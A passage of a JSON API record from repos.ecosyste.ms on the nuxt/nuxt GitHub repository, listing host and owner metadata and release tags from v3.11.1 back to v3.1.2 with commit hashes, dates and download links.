hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":192434804,"owners_count":12699550,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"nuxt","name":"Nuxt","uuid":"23360933","kind":"organization","description":"The Intuitive Vue Framework","email":null,"website":"https://nuxt.com","location":"Global","twitter":"nuxt_js","company":null,"icon_url":"https://avatars.githubusercontent.com/u/23360933?v=4","repositories_count":61,"last_synced_at":"2024-05-20T15:02:00.816Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/nuxt","funding_links":["https://github.com/sponsors/nuxt"],"total_stars":99051,"followers":3259,"following":0,"created_at":"2022-11-02T16:30:40.909Z","updated_at":"2024-05-20T15:02:03.446Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt/repositories"},"tags":[{"name":"v3.11.1","sha":"a80d1a0d6349bf1003666fc79a513c0d7370c931","kind":"commit","published_at":"2024-03-18T21:33:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1/manifests"},{"name":"v3.11.0","sha":"78d5098c28d2e21622961d8b87ef9b4623194fec","kind":"commit","published_at":"2024-03-17T08:15:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0/manifests"},{"name":"v3.10.3","sha":"aaad9924339b4c45d7feb45ed84bac4052edfcf0","kind":"commit","published_at":"2024-02-22T13:56:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3/manifests"},{"name":"v3.10.2","sha":"ceebcde36642fd3711a2567658cb1337a0475153","kind":"commit","published_at":"2024-02-14T13:00:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2/manifests"},{"name":"v3.10.1","sha":"460e0cfebd0ad19c7928c8d986e59f93a1bba1a3","kind":"commit","published_at":"2024-02-05T16:48:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1/manifests"},{"name":"v3.10.0","sha":"da3c502f08587f93e1134bc8e7aea1dee8d628fb","kind":"commit","published_at":"2024-01-30T15:25:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0/manifests"},{"name":"v3.9.3","sha":"fd8b263326c8703815a7e043948c22a8e5b969e2","kind":"commit","published_at":"2024-01-17T14:19:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3/manifests"},{"name":"v3.9.2","sha":"97ed2df423ebd8038f16d81e00cd2836ba2d712a","kind":"commit","published_at":"2024-01-16T17:00:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2/manifests"},{"name":"v2.17.3","sha":"4aa989d68a1934bd107fc5ad4e87549d39277ecd","kind":"tag","published_at":"2024-01-12T15:13:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3/manifests"},{"name":"v3.9.1","sha":"6736decba0dc8bbc7276848a8a26973440ebdee4","kind":"commit","published_at":"2024-01-05T21:55:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"c28ef02a1779b1c8a30c3daa2049d3c81a88ac91","kind":"commit","published_at":"2023-12-25T17:24:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0/manifests"},{"name":"v3.8.2","sha":"8d1fc6c4a9b0f6a662a006489162e66fdeb677b1","kind":"commit","published_at":"2023-11-20T22:22:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2/manifests"},{"name":"v3.8.1","sha":"d8674b99820d0e4dd620b20d38efb2ee52c80e52","kind":"commit","published_at":"2023-11-06T11:54:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1/manifests"},{"name":"v2.17.2","sha":"2080d82471962a5a6ea2c7b38c8975c961e919f8","kind":"tag","published_at":"2023-10-24T03:05:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2/manifests"},{"name":"v3.8.0","sha":"59ff865b133aaf82876f73b2d0566a00081b2795","kind":"commit","published_at":"2023-10-19T15:21:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0/manifests"},{"name":"v3.7.4","sha":"5abd8a231f26a2e08071a59caa87b80eaaa6cd91","kind":"commit","published_at":"2023-09-26T00:18:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4/manifests"},{"name":"v3.7.3","sha":"16e40f899e753208dd270c30869d240fbff0b8a2","kind":"commit","published_at":"2023-09-13T22:52:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3/manifests"},{"name":"v3.7.2","sha":"ebacf199fe52b9dfd5cb48f2f4735df0e9adbaac","kind":"commit","published_at":"2023-09-12T21:35:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2/manifests"},{"name":"v3.7.1","sha":"88a6d0a499cc7696bff94c02548cd9cc60f7820b","kind":"commit","published_at":"2023-09-05T13:49:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"9013f88e75f499e650463e3c80d116d0ce898a14","kind":"commit","published_at":"2023-08-25T23:26:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0/manifests"},{"name":"v3.6.5","sha":"f6a3adb52156774ab372829a2ee2533906758288","kind":"commit","published_at":"2023-07-19T17:40:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5/manifests"},{"name":"v3.6.4","sha":"380a91985c350281aba2d8eb16c65b0ebc39ea8b","kind":"commit","published_at":"2023-07-19T15:19:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4/manifests"},{"name":"v3.6.3","sha":"f068ad5edda4aaf79906a58ab472c9c3c0f564f1","kind":"commit","published_at":"2023-07-14T22:48:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3/manifests"},{"name":"v2.17.1","sha":"9de25afa865ca6861a7bb6e3b6b89df56616d93d","kind":"tag","published_at":"2023-07-14T22:35:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1/manifests"},{"name":"v3.6.2","sha":"88f914e9a01cb8ed196afb653dbcb4f7a5123b15","kind":"commit","published_at":"2023-07-05T21:42:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2/manifests"},{"name":"v3.6.1","sha":"54a0d5e8dc2184f995169e6b4c5adaba9cffaa6c","kind":"commit","published_at":"2023-06-26T19:25:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1/manifests"},{"name":"v3.6.0","sha":"e58cfc81f03a2323c95e6671af7deb4c4288bf39","kind":"commit","published_at":"2023-06-23T12:06:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0/manifests"},{"name":"v2.17.0","sha":"1ce34ec2c438fbad9a04f7eda2ce4f439389ea9a","kind":"tag","published_at":"2023-06-09T20:51:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0/manifests"},{"name":"v3.5.3","sha":"199595f3afac38b2a41be0a1c5593a8b6ea03366","kind":"commit","published_at":"2023-06-06T00:24:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"d85348987f8fd0e36763de69d6c665b630532429","kind":"commit","published_at":"2023-05-29T11:48:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"f13ccfe8363e3ababea7379d07822953eea555aa","kind":"commit","published_at":"2023-05-21T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"9683c3dad3fc31d5a2f780f6e7e785c1eeedc797","kind":"commit","published_at":"2023-05-16T13:29:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0/manifests"},{"name":"v3.4.3","sha":"1464294d6abe13b54fdb8d204732345551c8e647","kind":"commit","published_at":"2023-04-28T19:08:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3/manifests"},{"name":"v3.4.2","sha":"607bfdcfefe3520c89202fe5a5525794792192d7","kind":"commit","published_at":"2023-04-20T13:51:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2/manifests"},{"name":"v3.4.1","sha":"940fb0b7ad73960257f3e5f868186c302308e43b","kind":"commit","published_at":"2023-04-13T10:31:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"25e3a9046cc1b3dd9c1bf2c188a627b0a9446ad2","kind":"commit","published_at":"2023-04-11T16:17:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0/manifests"},{"name":"v3.3.3","sha":"8e9d7157a8d4fae6d2d0ae4598dd7c2ae14e5571","kind":"commit","published_at":"2023-04-02T14:14:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"dd6f9c01ccea00ddb37d15ce1773a054b99f08db","kind":"commit","published_at":"2023-03-24T18:31:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2/manifests"},{"name":"v2.16.3","sha":"6ca842e36ed935950608f02b539fc2985f5f3ef9","kind":"tag","published_at":"2023-03-17T15:39:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3/manifests"},{"name":"v3.3.1","sha":"184d57bb1923b8bf21a372eabdb67e1241d2023f","kind":"commit","published_at":"2023-03-14T14:45:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"2ebf5f4c4488c911e8bcc273cb8b12b86bf3562e","kind":"commit","published_at":"2023-03-14T13:22:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0/manifests"},{"name":"v2.16.2","sha":"ca8b375e2eb38c452b1b227e83c2cdad6de2f030","kind":"tag","published_at":"2023-03-01T13:03:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2/manifests"},{"name":"v3.2.3","sha":"021ba4310e47301996967c2a9b581152095cb995","kind":"commit","published_at":"2023-02-28T11:19:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3/manifests"},{"name":"v3.2.2","sha":"3a832bacb8f747bc3df656ddb926defe607b07f3","kind":"commit","published_at":"2023-02-17T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2/manifests"},{"name":"v3.2.1","sha":"5c47d4c5ab0add324a412c9d64700acf41b41f5b","kind":"commit","published_at":"2023-02-17T15:56:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1/manifests"},{"name":"v2.16.1","sha":"41148648ee597424c94a31ce0f36bb742c5ec695","kind":"commit","published_at":"2023-02-13T12:08:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1/manifests"},{"name":"v3.2.0","sha":"5855c1ed53ae1336fcfeb118a27c7201a9b83949","kind":"commit","published_at":"2023-02-09T10:55:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0/manifests"},{"name":"v3.1.2","sha":"225988ebd56aedf831b37bfce293ba76814ddb59","kind":"commit","published_at":"2023-02-03T12:56:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.2","dependencies_parsed_